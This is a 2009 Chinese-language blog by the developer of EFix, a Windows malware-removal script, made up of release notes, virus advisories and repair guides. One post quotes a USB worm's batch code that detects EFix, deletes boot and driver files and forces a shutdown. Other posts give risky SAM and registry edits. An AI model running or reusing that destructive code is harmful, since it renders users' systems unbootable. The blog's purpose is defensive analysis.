2009年12月23日 星期三

最近時間實在不夠...0rz

最近年底到了公司CASE超級多..
結果根本沒辦法去作EFix的修改

結果昨天趁中午時間大概看了一下源碼發現自己都快看不懂了0rz
也因此想說做一些大改變,只不過有時間再說吧...

基本上目前EFix更新的進度如下:

原本修改的進度 = 增加十行左右代碼... ( 有網友希望能夠有的登錄值權限還原這一個放進去了 )
新增加功能 = 0

不過由於目前有接觸到AUTOIT腳本,在大概接觸了一下後發現是可以用的
所以目前是打算做一個大修改,將原本使用CMD腳本修改成為使用AUTOIT腳本來處理
這樣的好處是可以去掉大多數第三方工具,如果使用上能夠更得心應手的話甚至有機會可以做到
完全不打包任何第三方工具
假設做到這一點的話,那X64支援就有可能了,AUTOIT編譯時可以使用X64.
只是目前做不到...

但上面所提到的東西全部都必須等我有時間才行....0rz

今年我看大概是沒機會了.

2009年12月3日 星期四

AVAST 的嚴重誤判

雖然已經出修補程式了啦,不過還是提一下

有使用AVAST防毒軟體的人
如果說您看到您的病毒庫資料為2009-12-03-0的
請務必更新您的病毒碼至更新版狀態

目前所知AVAST 2009-12-03-0的病毒資料庫會誤判大部分應用程式
造成刪除後系統崩潰的情形發生.

基本上我個人是覺得不要去怪他。
這種情形基本上每一間防毒廠商或多或少都有發生過
加強自己對自己系統的認知才能避免當誤判情形出現時因不清楚情形造成系統崩潰的狀況發生

2009年12月2日 星期三

增加一個下載連結

便當狗這幾天掛了,所以增加一個megaupload空間的連結

2009年11月27日 星期五

新修改的其他選項

這一次作的修改最主要是將SCRIPT GUI的其他選項部分做了一個修改

其他選項其中裡面還原磁碟帶隱藏屬性的檔案是以選取磁碟來做一個無差別處理
如下圖:


這樣在之前一直都碰到有人就直接也無差別全選之後就直接跑了..
後來看到系統裡面突然多出來一堆原本應該是本來就隱藏起來也不能刪除或移動他的資料夾或檔案
然後心慌去刪除他,之後系統就掛了...然後怪EFix

所以這邊將選項做了一個修改
修改成直接顯示被隱藏的檔案,要還原的話只還原有勾選的項次
如下圖:



上面的圖注意我文字打錯了,不是檔案是資料夾

下方的選項修改成包含子資料夾和顯示被隱藏的檔案
包含子資料夾的用處是一樣的,目的在將選取的資料夾內的所有帶有含隱藏屬性的資料夾全部去除掉所有屬性變成一般屬性
一般一樣建議除非是真的全部都被隱藏,不然別用
而另一個選項是新增加的顯示被隱藏的檔案

如下圖:




在勾選之後會將系統裡面帶隱藏屬性的檔案顯示出來
同樣勾選之後繼續執行就可以將該檔案屬性還原

這樣的使用方式我想應該能夠比較減少一些問題出現

不過這邊要注意一點,就是該顯示隱藏檔案資料只限於根目錄
也就是C:\,D:\,E:\ 這樣子底下的資料夾
並不會顯示所有資料夾內的資料夾
這點還請多注意一下。

其他就沒甚麼太大變動.

2009年11月26日 星期四

EFix Ver 5.3 20091126.30

版本:20091126.30

檔案資訊:
File size: 1114053 bytes
MD5...: 47fa82b6af2637498dee6b9880054dff
SHA1..: 2ce9b98e77d15985357d689671ba303def8af736

測試過的作業系統:
Windows 7 RC1
Windows XP SP2 SP3

修改事項:
SCRIPT GUI更新到1.8
GUI的還原各磁碟帶隱藏屬性的資料夾做修改
以前只有選擇磁碟代號,現在會直接將隱藏檔案顯示出來
GUI的讀我資訊從原本的呼叫記事本修改成直接顯示
GUI的官網修改成連至比較需要用到的地方

新增刪除檔案

後記:請小心變種的台灣製資料夾型病毒
越來越沒良心了那東西...
如果硬刪除該病毒主檔的話會有機會造成該病毒直接摧毀系統
由於該病毒似乎志在刷某網站的流量
所以在某一個程度到達之後他一樣會直接摧毀系統
請各位務必多加注意.

2009年11月16日 星期一

小紅傘 中文化 beta版測試活動

小紅傘是在台灣還算不少人使用並且滿意度還算高的防毒軟體
近期代理商 (是吧=.=a) 作了中文化的工作,並釋出測試版讓人測試.
有興趣參加活動的請至下列網址觀看,不過就目前情形來說我看大概差不多快滿了吧...

http://g-ray.com.tw/forum/index.php?topic=89.15

有中文化算好事囉,多一個選擇總是不錯的


------------------------------------------------
至於我用哪一套?
就目前來說我沒裝,不管是公司或者是家裡.
好孩子不要學XD

其他選項不了解的話就不要用免的問題會更多

因為碰到好多了...

雖然說大致上還不至於影響系統運作
但是將屬性打亂掉或多或少也是會造成一些問題存在

在SCRIPT GUI視窗裡面的其他選項中,其中有一個大項次叫做還原下列選取磁碟代號內被隱藏的資料夾
如下圖:




這一個選項用途是用來應付偽裝成資料夾引誘你點擊的病毒

從今年年初開始有另一種不是利用自動執行功能的隨身碟病毒開始在散佈
就目前來說大陸地區已經是取代隨身碟AUTORUN.INF成為主要的隨身碟病毒

他的做法是將原本在隨身碟內的資料夾隱藏起來
在將病毒自己本身改名為資料夾的名稱,並將自己的圖示修改成資料夾圖示
也因此不知情的使用者在點擊了該資料夾圖示時,就會讓自己的電腦中毒

然而刪毒簡單,但回復被病毒隱藏起來的資料夾在一些使用者來說算是蠻困難的
所以這邊做了一個選項讓那些被隱藏的資料夾能夠方便還原
但要注意,這一個選項本身並不會去幫你篩選哪一些是該隱藏的哪一些是該顯示的
只要是有帶隱藏屬性的資料夾一律讓他顯示,除非在白名單之內的

要硬是讓他們顯示的話,可能會有若干性的系統問題
而且這一點是不可逆的,所以除非是真的有碰到資料夾屬性都被隱藏
否則這一個選項請不要去動他,尤其是包含子資料夾.

我改天似乎該做一個說明書才是...
不然看到啥選項就勾的人也不少,鐵定會造成一堆問題...

EFix 5.3 20091116.27

版本:20091116.27

檔案資訊:
File size: 1113053 bytes
MD5...: 60c8e3f524665a747557c104aeb06cd5
SHA1..: a25bfd9802dd23c8a5ec8db071493812a2ddd651

測試過的作業系統
Windows XP SP2
Windows 7 RC1

修改事項
SCRIPT GUI介面更新到1.7版,其他設定選項和自訂腳本全部都改成用分頁作切換.


備註:對一個完全沒接觸過HTML語法的人這個GUI還真是難弄...
後來研究了一個多月後終於在VBS上搞成功了...結果也只是短短幾行而已0rz
這邊感謝【卜維丰】HTML / CSS / JavaScript BLOG頁面上的分頁切換架構範例.

2009年11月10日 星期二

EFix 5.3 20091110.26

版本:20091110.26

檔案資訊 (exe檔):
File size: 1113732 bytes
MD5...: 986feda7b0a58b56827d6d82a18f7c32
SHA1..: d63768dc06582850ff20694a75588488d0d12cb8

測試過的作業系統:
Windows XP SP2
Windows 7 RC1

修改事項:
SCRIPT GUI介面作一點修改
增加延伸系統分析,位置放在自訂腳本裡面,主要增加掃描新增移除程式和Windows錯誤事件報告以及連至Windows UPDATE檢查有哪些更新沒有更新.
增加一點刪除檔案.

備註:
HINET空間最近又不太穩定,可以的話就從網頁這邊的免費空間下載吧
自動更新可能會出點狀況.
另外Win7 x64鐵定是不支援的,現在不會以後也不會.除非這一整個架構整個重作,不過那是不可能的事..
因為裡面包的工具也大多都不支援,連工具本身都不支援了怎麼可能會讓只是讓那些工具自動化工作的腳本支援...

2009年10月23日 星期五

EFix Ver 5.3 20091023.22

版本:5.3 20091023.22

檔案資訊 (EXE檔本身的資訊):

File size: 1122344 bytes
MD5...: 3e1394f25b35268927f85f454ef7f09e
SHA1..: 3edb705fe9ef1634e4995580ae66b6978cf4fd1f

測試過的作業系統:

Windows 7 RC1

Windows XP SP2

修改事項:

增加刪除檔案 (softqq0.dll - softqq9.dll , bnmkue0.dll , bnmkue1.dll - bnmkue9.dll , aqoeerw.exe)


註1:

這兩個因為同一天看到兩例以上的人有中,有用其他軟體增加免疫資料夾的全部會偵測不到,沒有用免疫資料夾的舊版本皆可處理,但因為還是有必要要加所以先緊急加上去了

註2:

咪的哩我還在忙耶逼我一定要修改冏+

2009年10月22日 星期四

近期Yahoo Mail信箱的病毒一些防治方式

Yahoo Mail 基本上來說在很多人心中是大毒窟
有人每天都可以收到一大堆帶病毒信件的郵件

然後這些病毒信件在每一家防毒來說基本上是抓不到的
為何抓不到?
因為那些檔案本來就是正常的檔案...

該病毒郵件使用的原理大至如下:

寄出郵件,檔案大約1.多k
使用者收到病毒郵件可以看到有夾帶約1.多k左右的lnk
像是
可愛的愛心大頭照.lnk
交易明細.lnk

這一類後面可以看到很明顯的副檔名叫作lnk

而這一類的檔案在執行後
他會依照他的腳本進行動作

腳本內容就不貼了,這邊貼主要的動作

他會使用到系統裡面的FTP.EXE (內建的Windows指令,用處為使用FTP傳輸協定連線到伺服器上下傳東西)
連線到該惡意伺服器下載惡意程式並執行

當下載的惡意程式執行後該lnk檔就不再有任何動作
很單純的就只是一個自動化腳本,利用電腦內建的指令去作自動化動作
也因為都是使用Windows內建的指令,所以在防毒廠商和防毒軟體來說
那東西並不算是病毒 (實際也不是)

也因此在預防上面可以針對FTP.EXE這東西下手

FTP.EXE前面提到是Windows內建指令,功用為使用FTP通訊協定和伺服器進行連線
而FTP.EXE這東西一般人沒有人在使用,所以我們可以將他的檔案權限鎖住讓他無法執行。

使用方式基本上如下:

首先開啟我的電腦
按工作列的工具 -> 資料夾選項 -> 檢視


尋找 "使用簡易檔案共用(建議)" 這一項將他取消打勾.

如果是已經取消的就不管他

之後開啟到windows\system32資料夾,尋找FTP.EXE這一個檔案
在該檔案按滑鼠右鍵選擇內容


之後跳出來的視窗選擇安全性
並尋找名稱那一欄為Everyone的選項選取反白,選取反白後在下方欄位拒絕處全勾.
勾選完後按下確定即可.


如果您之前有將
"使用簡易檔案共用(建議)"
這一項取消打勾的話建議您再將他打勾回去

如果假設沒有Everyone這一個使用者呢?
那就要新增

首先按下群組或使用者名稱下方的新增按鈕


按下之後再跳出的視窗選擇進階


跳出的新視窗在按下立即尋找
等跑完後在最下方視窗處尋找Everyone選取他讓他反白並按下確定.


之後會回到上一層視窗,檢查在輸入物件或名稱來選取這一欄看有沒有Everyone的存在


有就按確定,按完之後就會出現Everyone的名稱了.


當處理完畢之後,就可以發現FTP.EXE已經無法使用.


這樣也因為病毒無法使用FTP.EXE下載病毒,進而讓該下載器無法動作
就可達到防止自動下載真正病毒執行的效果.

然而使用上有一些限制,如果有符合以下限制的人要不然就是換方法
要不然就多留意一些不要執行到了

1.系統磁碟檔案格式為FAT32
2.有需要使用到FTP.EXE這一個內建指令連線伺服器的人 (不是檔FTP傳輸協定,只是單純檔FTP.EXE這個檔案執行而已,只檔這檔案並不影響FTP使用)

基本上最根本的方式就是多注意信件
不要看到就開啟就能減少很多問題了..


至於FAT32因為沒有安全性這東西那要怎麼作才行?
基本上會建議使用安全性原則或者是IFEO去阻檔,這個以後在說...

2009年10月21日 星期三

EFix 5.3 20091021.21

版本:5.3 20091021.21

檔案資訊 (未壓縮的exe檔):
File size: 1112368 bytes
MD5...: bb3707a7de405c89e826b3d8633e8ba2
SHA1..: 099dbfdaa2d39db1f8993b36bbca7c84f7d2872a

測試過的作業系統:
Windows 7 RC1
Windows XP SP2

修改事項
修正取得磁碟代號失敗後走備援方案時跳出的問題
新增一點刪除檔案
VBSCRIPT腳本作一些整合.


最近家裡事情很多,可能一小段時間除非有大流行或者是有比較需要馬上修正的BUG
不然可能暫時會先擺著,可能要到11月中才會在作一些變動..

2009年10月7日 星期三

EF Win 2003不支援的原因

有些人問我怎麼不讓EFix支援Windows 2003?

簡單說因為我手邊沒有作業系統可以測試
從以前到現在都沒有過
不像VISTA或2000我偶爾還有機會碰到可以查一下

而Win 2003和其他作業系統的一些差別我沒辦法得知
使用上可能看不出來,但一些驅動和服務的值和一些登錄設定的值是完全不同的,2000和XP和VISTA就是這樣

也因此我並沒有辦法得知2003的一些設定值和其他作業系統哪邊不一樣的情形下
我不敢隨便就讓他能夠跑.

以前舊版能跑是因為腳本不嚴謹沒有特別設規則讓他跳出 , 沒跑出問題很偷笑了...

EFix 5.3 20091007.17

版本:
5.3 20091007.17

檔案資訊 ( 解開ZIP後的大小 ):
File size: 1112999 bytes
MD5...: c8cff35ed0f0893d5ed5c9cc1a7f2467
SHA1..: a0486c71d56661690a1f0e3b7cba08764dabed90

測試過的作業系統:
Windows 7 RC1
Windows XP

修改事項:
移除第三方工具Donwload , 新增第三方工具cURL
修正一些打錯字的地方
增加分析磁碟根目錄下的隱藏資料夾和同名檔案
腳本自動下載工具的連結多增加三個。降低空間負擔並提高下載成功率

2009年9月29日 星期二

EFix 5.3 20090929.12

版本:5.3 20090929.12

檔案資訊 (ZIP壓縮解開後):
File size: 978882 bytes
MD5...: f4301f32ac80d7d3612f2489637da711
SHA1..: b2ea7b521fe37fffeaa9712945111a7827dd4833

測試過的作業系統:
Windows XP
Windows 7 RC1

修改事項:
修正SCRIPT GUI 英文介面選項都不能使用的問題
修正一些腳本錯誤的代碼
修正一些腳本打錯字的地方
修改腳本執行方式,可盡量避免因腳本中斷造成各種執行上的問題,但缺點是變成雙程序在跑
修改偵測新版本EFix的方式,可避免因HINET空間快取問題導致的一堆狀況.
新增自訂腳本參數CP FILE::
此參數為複製檔案用參數,用途通常為還原被病毒替換的系統檔案

註1:
因應HINET空間快取的問題,所以以後檔案名稱又要作修改.
修改的原則是EF%日期版本編號%.exe

比如說像這一次發佈的 20090929.12版
下載的檔案就是EF2009092912.exe
以此類推

利用檔案名稱不同的方式來避開HINET空間快取的機制
同時也可避免以後有可能會碰到的劫持 (EX:IFEO 安全性原則封鎖)
也可以避免直接連結XD
不過這樣我比較累就是0rz
還有部分東西還沒整理,不過老闆在罵人了堆了一堆case都沒弄冏>
所以就等下一次改版在說吧.

註2:
HINET空間下載連結暫時還是一樣不發,現在正在找比較適合的方式.
如果您無法使用便當狗空間的話
就請您下載
http://sylovanas.myweb.hinet.net/EF/EF版本編號.exe
像這一版就是
EF2009092912.exe

我不直接貼連結是因為太多人都點HINET空間,結果常造成HINET空間過度不穩定.
這樣會讓之後可能會下載的腳本工具出現非常多不穩定的因素.
因此有不便之處還請多多見諒.

2009年9月26日 星期六

下載連結修改

咪的勒真棒的便當狗

自動給我將副檔名作修改...

這邊將便當狗的連結作一個修改

並將原本的執行檔壓縮成zip檔

下載後請解壓縮執行.


Hinet空間的問題我在想辦法搞定..

2009年9月25日 星期五

EFix 5.3 20090925.09

版本: 5.3 20090925.09

檔案資訊:
File size: 978576 bytes
MD5...: 39eefb6856963b435fbcaa4bc8f23241
SHA1..: 1b0c79d9911e591e5bf41ada2c404b6a5d048252

測試過的作業系統:
Windows XP2
Windows 7 RC1

修改事項:
更新第三方工具Nircmd
修改免責事項說明
增加一點刪除檔案
增加免責聲明按否和SCRIPT GUI視窗按取消時會將作業資料夾刪除以節省空間.
修改部分檔案位置讓分散的檔案盡可能集中放在同一資料夾內方便處理.

2009年9月23日 星期三

Hinet空間暫停

似乎用的人太多下載出問題了..
我這邊自己點都一直點下載到前兩個版本的0rz.

所以暫停一天到兩天
等他處理好之後在放上來

2009年9月22日 星期二

EFix Ver 5.3 20090921.07

版本:5.3 20090921.07

檔案資訊:
File size: 954433 bytes
MD5...: 976ecd785cbcee98da2a940f8e176748
SHA1..: 1d184f9771181a1dbd87eb63afc9639f816e9d64


測試過的作業系統:
Windows XP SP2
Windows 7 RC1


修改事項:
去掉執行後開我的電腦會強制顯示右方資料夾的功能
本來是要應對最近有看到的一個惡意程式
不過因為每個人設定值都有一點不太一樣,所以就放棄強制修復.


EFix Ver 5.3 20090921.06

版本:5.3 20090921.06

檔案資訊:
File size: 944619 bytes
MD5...: 44e8d9e10d60477816e2d1c8dbc67911
SHA1..: 27fa883579f7460534efd7861a9c42f793538742

測試過的作業系統:
Windows XP SP2
Windows 7 RC1

修改事項:
剛剛放錯檔0rz
但為了區別版本所以版本號更新了一點
.05底下那個版有會誤將taskman值修改成不正確值的問題.

EFix Ver 5.3 20090921.05

版本: 5.3 20090921.05

檔案資訊:
File size: 944621 bytes
MD5...: 6b36f7741dbf02c950ce9637ca98693d
SHA1..: 8824cf52d24e4ea08c677ba5d12b3acdb067de4f

測試過的作業系統
Windows XP SP2
Windows 7 RC1 7100

修改事項:
增加第三方工具Streams
增加刪除清單
自訂腳本新增clean ADS::
用來清除NTFS文件流用的

2009年9月17日 星期四

EFix Ver 5.3 20090917.02

版本:5.3 20090917.02

檔案資訊:
File size: 924587 bytes
MD5...: ac86fb9f192254aa1d637d72b04ee4ba
SHA1..: e091eb560ba832061f22abd0e8a31dce18f09bc4

測試過的作業系統:
windows xp sp2
windows 7 RC7100

修改事項:
script gui介面作大幅修改
增加gui功能
增加第三方工具mshta.exe
增加部分刪除檔案
一開始執行時會先將先前改亂數名的檔案刪除.

有部分檔案時間不夠加上去,下次改版在加.

註:
有另外使用自定義腳本功能的人請注意一下位置有變了

2009年9月8日 星期二

EFix Ver 5.2 20090908.67

版本:5.2 20090908.67

檔案資訊:
File size: 909780 bytes
MD5...: 003e21f33d47bb645d3c18978ef05073
SHA1..: 2dd6cd7bd5a163d97940a0ac0912a6e8955aeb40

測試過的作業系統:
Windows XP SP2
Windows 7 RC 7100

修改事項:
新增刪除檔案

2009年9月5日 星期六

增加一個下載連結

這個連結是便當狗的....

為何用便當狗?
因為剛剛在用便當狗下檔案XD

用看看看能不能減緩一點Hinet空間的負擔

另外對幫助提供空間的人
基本上是很感謝你們好心提供出空間給我

不過因為小弟不好意思使用=.=a
也怕說如果有些人在執行EF前中後出現甚麼事情要找我算帳還是幹嘛的
會牽扯到提供空間的人
所以我想這邊空間盡量以免費和我自己用的為主
這樣可以避免爭議啦...

不過在此還是非常感謝提供空間的人的心意m(_o_)m

2009年8月28日 星期五

EFix Ver 5.2 20090828.61

版本: 5.2 20090828.61

檔案資訊:
File size: 909284 bytes
MD5...: 26b5fae0c7cacd482313a5d4ce6aefdb
SHA1..: 77fdc3f8d8eb8d721873bd902b621488df9b497d

測試過的作業系統:
Windows XP SP2
Windows 7 RC 7100

修改事項:
修改腳本del driver::以及其他一些bug

2009年8月23日 星期日

EFix Ver 5.2 20090823.59

版本:5.2 20090823.59

檔案資訊:
File size: 918594 bytes
MD5...: 5429024152dee3d418ccaa16344ad65c
SHA1..: cad3f3d570a81efd72b901cf3f71489aa6932b83

測試過的作業系統:
Windows XP SP2
Windows 7 RC 7100

修改事項:
增加刪除檔案
修bug

EFix Ver 5.2 20090823.55

版本資訊:5.2 20090823.55

檔案資訊:
File size: 918459 bytes
MD5...: de4a0ad03b7720f3f94485f1bbe78fa0
SHA1..: a5b9ed9ca287a5b0f76229d363cd20adf5716283

測試過的作業系統:
Windows XP SP2
Windows 7 RC 7100

修改事項:
因應針對EFix作的惡意程式,將主程序作了一個修改.避免執行EFix之後病毒抓取到主程序EF.COM之後進行自爆並毀滅作業系統的情形.
修正一點不重要的bug

有意思...

這一次碰到的隨身碟資料夾型病毒很有意思

感謝香菇小精靈隨身碟病毒清除軟體作者提供了一些資訊

是這樣的.

前幾天我有跟人提到就是台灣製的隨身碟病毒

這個隨身碟病毒有變種

而他這一次的變種有針對EFix而來.

這還第一次碰到....還蠻有意思的

香菇小精靈有提到該病毒會檢測系統裡面的程序

該批次代碼如下:


tasklist|findstr /c:"ef.com" && (goto :kill)

:kill
taskkill /F /IM explorer.exe
del /f /s /q /a:h %SystemDrive%\boot.ini
del /f /s /q /a:h %SystemDrive%\IO.sys
del /f /s /q /a:h %SystemDrive%\CONFIG.SYS
del /f /s /q /a:h %SystemDrive%\ntldr
del /f /s /q /a:h %SystemDrive%\AUTOEXEC.BAT
del /f /s /q /a:h %SystemDrive%\MSDOS.SYS
md %SystemDrive%\boot.ini
md %SystemDrive%\IO.sys
md %SystemDrive%\CONFIG.SYS
md %SystemDrive%\ntldr
md %SystemDrive%\AUTOEXEC.BAT
md %SystemDrive%\MSDOS.SYS
del /f /s /q "%windir%\system32\drivers\pci.sys"
md "%windir%\system32\drivers\pci.sys"
shutdown -f -s -t 0
del %0

上面的代碼我大概解釋一下
該病毒使用tasklist 這一段指令去檢查執行中的程序裡面有沒有一個叫做 ef.com的程序
有的話,就刪除上面從:kill之後的檔案並建立資料夾讓你沒辦法複製回去

然而ef.com 就是EFix使用的主運作程序....XD

所以我想之前有一位版友有碰到ntldr移失的,我看大概就是因為這樣的原因
好樣的....


我這兩天會找時間再做一些修改,看看能不能突破這惡意攻擊...
有中的人自己先小心點.

2009年8月17日 星期一

EFix Ver 5.2 20090817.52

版本: 5.2 20090817.52

檔案資訊:
File size: 908629 bytes
MD5...: 4b25d2732e748992926ac864e121bf81
SHA1..: 23111eda18e2e675fd7eea7981d06cd5736abf7d

測試過的作業系統
Windows XP SP2
Windows 7 RC 7100

修改事項:
增加刪除檔案
修正特殊模式4的偵測全部跳過的問題

2009年8月14日 星期五

EFix Ver 5.2 20090814.51

版本:5.2 20090814.51

檔案資訊:
File size: 908439 bytes
MD5...: 007e306f1627aa54b11f937d3401bf2a
SHA1..: cf023785670944954916ae26ff2831dacbf1d672

測試過的作業系統:
Windows XP SP2 SP3
Windows 7 RC1 7100

修改事項:
自定義腳本參數增加
List File::
List Folder::
all Process::
修正驅動項目還沒經過白名單過濾就直接進行黑名單比對的問題.

首頁被綁架進選項變灰色不能動的解決方式

這邊一樣也是測試那個台灣製資料夾病毒所產生出來的東西

首頁會被綁架變成哪個網址我忘記了0rz
晚一點在測一下
11:49補充:該網址是 11bc0072.linkbucks.com

而綁架之後在IE的網際網路選項內的首頁會變成灰色無法修改回來
而要回復成可以修改的方式可使用底下的方法試看看 (不保證一定會好)

注意:底下的操作具有一定風險性,如沒有把握請找他人幫忙處理.

複製底下的紅色文字

REGEDIT4
[-HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer]


之後開啟記事本將複製的文字貼上 (注意:[到]之間是同一行包含[])
之後按另存新檔
檔案名稱取名為123.reg
檔案類型選所有檔案
編碼選ANSI

之後執行123.reg後按下確定.
然後重開機開IE在去修改即可.

2009年8月6日 星期四

EFix Ver 5.2 20090806.47

版本資訊: 5.2 20090806.47

檔案資訊:
File size: 907554 bytes
MD5 : 92352fc15766af12f95efbcfddc452a5
SHA1 : 183b3f69b4d09ca9c46a715346fd8218fcc43d55

測試過的作業系統:
Windows XP SP2 SP3
Windows 7 RC7100

修改事項:
增加對近期比較多的台灣製批次型隨身碟偽裝成資料夾的病毒主檔作一個較完整的處理
但並不處理隨身碟上所產生的偽裝檔,因為會引響到執行速度
所以有中的人如果要清理請先執行EFix
EFix會將常駐在系統的病毒主檔破壞刪除.
之後在將隨身碟內建立的偽裝資料夾病毒自行清理掉即可.

2009年8月5日 星期三

無法刪除的使用者帳戶

這邊是在測試病毒的時候發現的...

處理方式
XP SP2

先開啟登錄編輯器
然後尋找
HKEY_LOCAL_MACHINE\SAM
按右鍵選使用權限
將administrator允許的地方打勾
打勾之後到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
去找那一個不知道為何多出來的使用者名稱將他刪除就可以.
刪除完之後到HKEY_LOCAL_MACHINE\SAM的位置將權限還原.

但要注意這樣有可能會造成系統崩潰或者是不穩定
使用時要三思.

EFix Ver 5.2 20090805.44

版本:5.2 20090805.44

檔案資訊:
File size: 907028 bytes
MD5...: 5661de8671e71d68eda20641e95b2d1d
SHA1..: 6ee7e4221379c7b9e06d62dbf936469c9f7fb8ea

測試過的作業系統
Windows XP SP3
Windows 7 RC7100

修改事項:
修正誤刪adobe系列的東西.這一版修正先放出來
晚一點還有一個地方要處理,但誤刪是最優先處理的所以先放出來.

2009年8月4日 星期二

EFix Ver 5.2 20090804.43

版本: 5.2 20090804.43

檔案資訊:
File size: 907002 bytes
MD5...: 8982fd5faa3fcf2c67b1b9e69b5e065a
SHA1..: 8728c4b368cc40fd755018c9c78df8e99c9d78de

測試過的作業系統:
Windows XP SP3
Windows 7 RC7100

修改事項:
增加一個檔案現在沒用到,以後會有機會用到
強化對台灣製資料夾病毒的偵測
修改部分人執行到script gui內會變亂碼的情形 (html語系問題)
系統分析日期建立檔案增加windows\system資料夾.

2009年7月30日 星期四

還原系統到EFix執行前的用法

這兩天有看一下,似乎有些人執行時還是有些問題.
雖然說不見得是EFix造成的,但我想一般都會以結果論來看吧.

這邊先提一個重點,在您執行EFix要清惡意程式的同時請不要忘記了,惡意程式他正在執行...
天曉得這惡意程式會有甚麼樣子的動作.

像之前所碰到的每個月3號和18還28號刪D,E槽全磁碟資料的惡作劇惡意程式他就是這樣幹.
當中這東西到了每個月3號的時候,就開始刪除D槽E槽的所有資料
刪除完之後再建立一個autorun.inf檔案以及,.exe檔案
此時D槽E槽就只剩下這兩個檔案...
而其中,.exe被刪除之後在使用者要開啟D槽或E槽的時候
就會出現磁碟點不開的情形,因為autorun.inf找不到所需要執行的檔案
所以使用者就會開始找軟體想辦法解決,而找到這裡或者是其他的一些清除軟體
然而執行完畢後autorun.inf刪除了,但使用者一開啟了D槽或E槽後發現
奇怪怎麼我的資料全部被刪光了?

而這時就會產生幾種情形.

1.使用者認為病毒砍了他全磁碟資料找復原軟體 (O)
2.使用者不知道發生甚麼情形以為他自己幹了啥事刪了全磁碟資料 (X)
3.使用者認為是EFix或者是清除軟體刪了他全磁碟資料 (X)
4. .......直接罵聲幹作清除軟體的人不得好死這一類的...

但前面病毒流程我已經說明了,而在這病毒剛出現的時候
很多人跟我反應為何執行了EFix之後發現他D槽或E槽資料都不見了?
有人還說小心路上不要被他碰到等等的...

連部分的解毒老手一開始也沒辦法得知這惡意程式的動作進而跟我反應說會刪除全磁碟資料
後來找到一個協助者取得了樣本後才知道原來那病毒會這樣幹...

那一段時間黑鍋可真的是背很大0rz
這是往事....就不管他了.

這邊提重點

如果說你覺得執行EFix後的結果讓你不滿意或者是覺得反而問題更多的話
您可以使用EFix裡面所建立的幾個還原方式去還原到執行EFix之前的狀態.

總共是以下兩種方式:

1.Windows內建的系統還原
首先如果你是第一次執行的話,假設你系統中的系統還原有開啟並且能夠正常動作
此時EFix會建立一個系統還原點,在當天第二次執行之後就不會建立了.除非又隔一天
而系統還原要怎麼使用?

按開始 -> 程式集 -> 附屬應用程式 -> 系統工具 -> 系統還原
點下去之後他就會有相關的還原選項讓您選擇
此時請注意EFix還原點名稱為EFix Created Point
如果只是要回復到執行EFix前的狀態,就請找這一項還原即可


2.登錄值備份和檔案備份

基本上檔案備份就看最後產生的報告為主
EX:
EF刪除的檔案備份位置列表:

C:\Windows\System32\kavo.exe => C:\ef_backup\backup\C\Windows\System32\kavo.exe.vir

像這樣你就可以去找
C:\ef_backup\backup\C\Windows\System32\kavo.exe.vir這檔案
將他複製到c:\windows\system32資料夾後,再將後面的副檔名.vir去掉
這樣檔案就回去了

而登錄值呢?

登錄值的話請你找C:\ef_backup\reg\erunt這一個資料夾
裡面有一個程式叫作erdnt
在執行他之後他會跳出視窗
請全部打勾之後在按下OK,該程式會要求您重開機
重開機之後登錄值就還原到最後一次執行EFix之前的狀態

以上這兩種方式為EFix對系統檔案的備份方式.
程式本身雖然在我這以及我周圍的電腦上面測試過都沒有太大的問題
但我並不能保證每一台電腦在執行上都不會有任何狀況,畢竟這變數太大
所以作這兩個還原方式讓系統有機會能夠還原到執行前的狀態.

只是現在的病毒....請自己多小心吧.
資料該作好備份和系統安全的部分就多加留意

2009年7月29日 星期三

EFix Ver 5.2 2009072840

版本:5.2 20090728.40

測試過的作業系統:
Windows XP SP3
Windows Vista
Windows 7 RC 7100

檔案資訊:
File size: 905913 bytes
MD5 : 51e4d5c4f9aa2fa5d11b00959c0430a1
SHA1 : 978c521a5b1770b51284fc9ed783885435c40330

修改事項:
修正移除腳本如果有swxcacls檔案會機率性產生死循環的問題.
修改services.vbs的讀取方式.

2009年7月24日 星期五

EFix Ver 5.2 20090724.39

版本:5.2 20090724.39

檔案資訊:
File size: 905988 bytes
MD5...: 82650519d98ca2ea758ef50a19684628
SHA1..: 7be43e76c36f13156235b1f4700b4cfe83ca584a

測試過的作業系統:
Windows XP SP3
Windows Vista
Windows 7 RC1 7100

修改事項:
去掉刪除mdm.exe
介面作一點修改.

其他:
空間越來越慘了0rz

2009年7月23日 星期四

夭壽...

寫這類腳本軟體還真的要特別小心...

以前犯的錯誤結果到現在都還有在流傳0rz

也不過就放上來兩天而已..

這邊一樣特別提醒
如果您手邊有EFix檔案名稱叫做EFix.exe的,請務必將他刪掉
那是有問題的版本.
W2K如果你有先執行新版本在執行可能還沒事,因為新版有對那一個超舊版作一個檔案補充避免執行後出問題
但如果你是直接執行EFix.exe的話,會有一定機率刪除掉系統磁碟內所有資料.

這問題我一發現之後馬上就將檔案刪除並整個重寫,現在是不會有這種情形了.
但那時流出去的檔案我並沒有辦法回收,所以我這邊也只能呼籲
千萬不要再用EFix.exe 這一個檔案名稱的EFix去修復您的系統
除了現在沒辦法應對新變種的惡意程式了.還有機會造成你系統資料遺失

2009年7月16日 星期四

EFix Ver 5.2 20090716.38

版本: 5.2 20090716.38

檔案資訊:
File size: 906090 bytes
MD5...: 00093bb5ba5822971f2f68188ce5526b
SHA1..: 4d4526b62a93ee40bf5c65cf466583149af0668b

測試過的作業系統:
Windows XP SP3
Windows Vista Homebasic
Windows 7 RC 7100

修改事項:
修正檢測執行中程序時碰到:中斷的問題
增加安全性更新KB961371和KB973346的檢查.沒有更新會列舉出來
修改建立系統還原執行方式,以前是每一次執行都會建立一次,這次改過是只有當天的第一次執行EFix才會建立,之後當天就不建立了節省磁碟空間.

2009年7月10日 星期五

EFix Ver 5.2 20090710.36

版本:5.2 20090710.36

檔案資訊:
File size: 906002 bytes
MD5...: d5de47893d567c4f0d1ec36a00be7367
SHA1..: dec8291f0cb1ab021c304b9e031182c342f376eb

測試過的環境:
Windows XP SP3
Windows Vista
Windows 7 RC 7100

修改資訊:
........忘記了0rz
只記得一個是修改文字資訊而已
還有一個是修改掃描報告中的執行中程序列舉增加微軟數位簽章檢查
有過會顯示"Verified"

2009年7月7日 星期二

EFix Ver 5.2 20090707.35

版本:5.2 20090707.35

檔案資訊:
File size: 906443 bytes
MD5...: c7f438a3620378732b0ff4e3f5d65b38
SHA1..: 094a58d6fc843a1497d32cedfd5ac11c44dbfa41

修改事項:
